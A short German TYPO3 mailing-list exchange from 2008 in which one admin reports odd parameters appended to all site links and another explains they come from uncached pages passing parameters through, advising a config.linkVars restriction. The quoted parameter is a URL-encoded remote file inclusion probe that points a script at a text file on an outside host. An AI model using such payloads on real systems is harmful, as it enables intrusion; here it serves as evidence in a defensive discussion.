[TYPO3-german] bots
Alexander Herrmann
darignac at googlemail.com
Fri Apr 25 12:48:42 CEST 2008
Hm, na gut, wusste ich nicht, hätte ja sein können. Dann bin ich
wieder etwas schlauer, ich danke dir!
ciao
Alex
2008/4/25, Georg Ringer <mail-spam at ringerge.org>:
> Alexander Herrmann schrieb:
> > wir haben in einem unserer Typo3-Installationen grad einen kleinen
> > Angriff gehabt. Und zwar hatte jeder Link der Seite noch einen kleinen
> > Anhang ala "&L=0%2F%2Fncaster%2Fadmi...m%2Fimag%2Fstringa.txt%3F%2Fncaster%2Fadmin%2Faddons%2Farchive%2Farchive.php%3Fadminfolder%3Dhttp%3A%2F%2Fxuxulio.iespana.es%2Fxuxuon.txt%3F%3F"
>
> Also bisschen aufpassen mit den Begriffen, die sicherheitssensibel sind!
> Das ganze ist keine injection!
>
> Funktionieren tuts einfach:
> Seite ist noch nicht gecached und wird mit irgendwelchen Parametern, die
> werden dann übernommen.
>
> Was man dagegen tun kann:
> die TsRef mal lesen und nicht immer drüberscrollen, in dem Kapitel warst
> du (hoffentlich) schon 1000x!
> http://typo3.org/documentation/document-library/references/doc_core_tsref/4.1.0/view/7/3/
> 1. Parameter >
> config.linkVars = L(1-10)
>
> Georg
> _______________________________________________
> TYPO3-german mailing list
> TYPO3-german at lists.netfielders.de
> http://lists.netfielders.de/cgi-bin/mailman/listinfo/typo3-german
>
More information about the TYPO3-german
mailing list